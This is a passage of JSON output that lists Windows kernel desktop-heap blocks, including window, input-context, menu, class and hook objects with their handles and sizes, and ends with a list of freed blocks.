sedBytes":16},{"Block":"0xffffc8d500622bc0","Type":"WINDOW","Handle":"0x3024a","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500622d90","Type":"WINDOW","Handle":"0x3024c","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500623160","Type":"INPUTCONTEXT","Handle":"0x1024e","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006231d0","Type":"INPUTCONTEXT","Handle":"0x20250","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500625230","Type":"WINDOW","Handle":"0x40252","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d5006234b0","Type":"WINDOW","Handle":"0x30254","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500623680","Type":"WINDOW","Handle":"0x10256","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500623ab0","Type":"WINDOW","Handle":"0x10258","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500623d70","Type":"WINDOW","Handle":"0x1025a","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500624010","Type":"WINDOW","Handle":"0x1025c","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d5006242a0","Type":"WINDOW","Handle":"0x1025e","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500624530","Type":"WINDOW","Handle":"0x10260","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500624cf0","Type":"WINDOW:PROPLIST","Size":4,"UnusedBytes":8},{"Block":"0xffffc8d500625bd0","Type":"WINDOW","Handle":"0x20262","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d5006247a0","Type":"WINDOW","Handle":"0x1026c","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500609c30","Type":"WINDOW","Handle":"0x70270","Size":25,"UnusedBytes":32},{"Block":"0xffffc8d500627e60","Type":"WINDOW:PROPLIST","Size":9,"UnusedBytes":8},{"Block":"0xffffc8d500626040","Type":"WINDOW","Handle":"0x40272","Size":24,"UnusedBytes":12},{"Block":"0xffffc8d500624940","Type":"WINDOW","Handle":"0x10274","Size":24,"UnusedBytes":8},{"Block":"0xffffc8d500602940","Type":"WINDOW","Handle":"0x2027c","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500624d30","Type":"WINDOW","Handle":"0x1027e","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500624ed0","Type":"WINDOW:PROPLIST","Size":4,"UnusedBytes":8},{"Block":"0xffffc8d50061be20","Type":"INPUTCONTEXT","Handle":"0x20280","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500624f10","Type":"INPUTCONTEXT","Handle":"0x10284","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006253c0","Type":"INPUTCONTEXT","Handle":"0x10286","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500625500","Type":"WINDOW","Handle":"0x10288","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d5006256b0","Type":"WINDOW","Handle":"0x1028a","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500625940","Type":"WINDOW","Handle":"0x1028c","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d50062cb50","Type":"WINDOW","Handle":"0x70298","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500626340","Type":"WINDOW","Handle":"0x6029c","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500626960","Type":"WINDOW","Handle":"0x7029e","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d5006264d0","Type":"WINDOW","Handle":"0x402a0","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500626b40","Type":"WINDOW","Handle":"0x102aa","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500626d20","Type":"WINDOW","Handle":"0x102ac","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500626f00","Type":"WINDOW","Handle":"0x102ae","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500620960","Type":"WINDOW","Handle":"0x202b0","Size":24,"UnusedBytes":12},{"Block":"0xffffc8d50062b030","Type":"WINDOW:PROPLIST","Size":9,"UnusedBytes":24},{"Block":"0xffffc8d500620f50","Type":"WINDOW","Handle":"0x102b2","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500628300","Type":"WINDOW:PROPLIST","Size":2,"UnusedBytes":8},{"Block":"0xffffc8d500627fa0","Type":"WINDOW","Handle":"0x102b4","Size":25,"UnusedBytes":20},{"Block":"0xffffc8d500628160","Type":"WINDOW","Handle":"0x202b6","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d5006297c0","Type":"WINDOW","Handle":"0x102b8","Size":24,"UnusedBytes":8},{"Block":"0xffffc8d50062b8f0","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":24},{"Block":"0xffffc8d500626af0","Type":"INPUTCONTEXT","Handle":"0x402b9","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50062c500","Type":"WINDOW","Handle":"0x402ba","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d500626cd0","Type":"INPUTCONTEXT","Handle":"0x402bd","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50062a140","Type":"WINDOW","Handle":"0x102be","Size":24,"UnusedBytes":16},{"Block":"0xffffc8d500626eb0","Type":"INPUTCONTEXT","Handle":"0x102bf","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50062a480","Type":"WINDOW","Handle":"0x102c0","Size":37,"UnusedBytes":8},{"Block":"0xffffc8d500627090","Type":"INPUTCONTEXT","Handle":"0x102c3","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50062a920","Type":"WINDOW","Handle":"0x102c4","Size":37,"UnusedBytes":8},{"Block":"0xffffc8d500627370","Type":"INPUTCONTEXT","Handle":"0x202c7","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50061bf00","Type":"INPUTCONTEXT","Handle":"0x202cd","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500628360","Type":"INPUTCONTEXT","Handle":"0x102e7","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d5006283b0","Type":"HOOK","Handle":"0x102e9","Size":8,"UnusedBytes":32},{"Block":"0xffffc8d500629960","Type":"INPUTCONTEXT","Handle":"0x102eb","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d500629b90","Type":"INPUTCONTEXT","Handle":"0x202ed","Size":5,"UnusedBytes":16},{"Block":"0xffffc8d50064f3e0","Type":"MENU","Handle":"0x104ab","Size":10,"UnusedBytes":8},{"Block":"0xffffc8d50064fa80","Type":"MENU:ITEMS","Size":73,"UnusedBytes":16},{"Block":"0xffffc8d50064f480","Type":"MENU","Handle":"0x104ad","Size":10,"UnusedBytes":8},{"Block":"0xffffc8d50064f520","Type":"MENU:ITEMS","Size":73,"UnusedBytes":16},{"Block":"0xffffc8d50062ab70","Type":"MENU","Handle":"0x104af","Size":10,"UnusedBytes":8},{"Block":"0xffffc8d50062c6c0","Type":"MENU:ITEMS","Size":73,"UnusedBytes":16},{"Block":"0xffffc8d50062cce0","Type":"WINDOW","Handle":"0x304b8","Size":24,"UnusedBytes":8},{"Block":"0xffffc8d50064f270","Type":"WINDOW","Handle":"0x204ba","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d50062bd80","Type":"WINDOW:PROPLIST","Size":3,"UnusedBytes":8},{"Block":"0xffffc8d500629ed0","Type":"WINDOW","Handle":"0x204bc","Size":23,"UnusedBytes":8},{"Block":"0xffffc8d5006204c0","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d50062b260","Type":"CLS:NAME","Size":4,"UnusedBytes":27},{"Block":"0xffffc8d50062ad70","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d50062bdb0","Type":"CLS:NAME","Size":5,"UnusedBytes":37},{"Block":"0xffffc8d50062bfa0","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d50062c050","Type":"CLS:NAME","Size":2,"UnusedBytes":25},{"Block":"0xffffc8d50062be00","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d50062beb0","Type":"CLS:NAME","Size":2,"UnusedBytes":25},{"Block":"0xffffc8d50062bc60","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d50062bd10","Type":"CLS:NAME","Size":2,"UnusedBytes":25},{"Block":"0xffffc8d50062bac0","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d50062bb70","Type":"CLS:NAME","Size":2,"UnusedBytes":25},{"Block":"0xffffc8d50062b920","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d50062b9d0","Type":"CLS:NAME","Size":2,"UnusedBytes":25},{"Block":"0xffffc8d50062b780","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d50062b830","Type":"CLS:NAME","Size":2,"UnusedBytes":25},{"Block":"0xffffc8d50062b5e0","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d50062b690","Type":"CLS:NAME","Size":2,"UnusedBytes":25},{"Block":"0xffffc8d50062b440","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d50062b4f0","Type":"CLS:NAME","Size":2,"UnusedBytes":25},{"Block":"0xffffc8d50062b2a0","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d50062b350","Type":"CLS:NAME","Size":2,"UnusedBytes":25},{"Block":"0xffffc8d50062b100","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d50062b1b0","Type":"CLS:NAME","Size":2,"UnusedBytes":25},{"Block":"0xffffc8d50062af80","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d50064ff90","Type":"CLS:NAME","Size":3,"UnusedBytes":41},{"Block":"0xffffc8d50062ae20","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d50064ff50","Type":"CLS:NAME","Size":2,"UnusedBytes":27},{"Block":"0xffffc8d50062acc0","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d5006155b0","Type":"CLS:NAME","Size":2,"UnusedBytes":27},{"Block":"0xffffc8d500620570","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d500629b50","Type":"CLS:NAME","Size":2,"UnusedBytes":27},{"Block":"0xffffc8d500620410","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d500629b10","Type":"CLS:NAME","Size":2,"UnusedBytes":27},{"Block":"0xffffc8d5006299b0","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d500617120","Type":"CLS:NAME","Size":2,"UnusedBytes":27},{"Block":"0xffffc8d50062a040","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d50062a0f0","Type":"CLS:NAME","Size":3,"UnusedBytes":25},{"Block":"0xffffc8d50062a6d0","Type":"CLS","Size":37,"UnusedBytes":16},{"Block":"0xffffc8d50064f240","Type":"CLS:NAME","Size":3,"UnusedBytes":21},{"Block":"0xffffc8d50062a390","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d50062a440","Type":"CLS:NAME","Size":4,"UnusedBytes":23},{"Block":"0xffffc8d500629d20","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d500629dd0","Type":"CLS:NAME","Size":3,"UnusedBytes":21},{"Block":"0xffffc8d50062a2e0","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d50062a120","Type":"CLS:NAME","Size":2,"UnusedBytes":9},{"Block":"0xffffc8d500629e00","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d500629eb0","Type":"CLS:NAME","Size":2,"UnusedBytes":25},{"Block":"0xffffc8d500629c50","Type":"CLS","Size":11,"UnusedBytes":16},{"Block":"0xffffc8d500629d00","Type":"CLS:NAME","Size":2,"UnusedBytes":25}]},"Freed":[{"Block":"0xffffc8d500617df0","Size":2},{"Block":"0xffffc8d500612240","Size":2},{"Block":"0xffffc8d500612680","Size":3},{"Block":"0xffffc8d50062bf70","Size":3},{"Block":"0xffffc8d50061ac60","Size":4},{"Block":"0xffffc8d500617a70","Size":5},{"Block":"0xffffc8d500617030","Size":5},{"Block":"0xffffc8d50062bd30","Size":5},{"Block":"0xffffc8d50062c670","Size":5},{"Block":"0xffffc8d50062b1d0","Size":5},{"Block":"0xffffc8d5006214e0","Size":6},{"Block":"0xffffc8d500629be0","Size":7},{"Block":"0xffffc8d50061ae60","Size":7},{"Block":"0xffffc8d50062b880","Size":7},{"Block":"0xffffc8d500629a60","Size":11},{"Block":"0xffffc8d50062aed0","Size":11},{"Block":"0xffffc8d50062ac10","Size":11},{"Block":"0xffffc8d50062b370","Size":13},{"Block":"0xffffc8d50062b6b0","Size":13},{"Block":"0xffffc8d50062b510","Size":13},{"Block":"0xffffc8d50062bb90","Size":13},{"Block":"0xffffc8d50062b9f0","Size":13},{"Block":"0xffffc8d50061af40","Size":25},{"Block":"0xffffc8d500609aa0","Size":25},{"Block":"0xffffc8d500621be0","Size":25},{"Block":"0xffffc8d5006193f0","Size":28},{"Block":"0xffffc8d500624b30","Size":28},{"Block":"0xffffc8d500616480","Size":29},{"Block":"0xffffc8d500620cb0","Size":42},{"Block":"0xffffc8d50062ce60","Size":8766}]} 2 | --------------------------------------------------------------------------------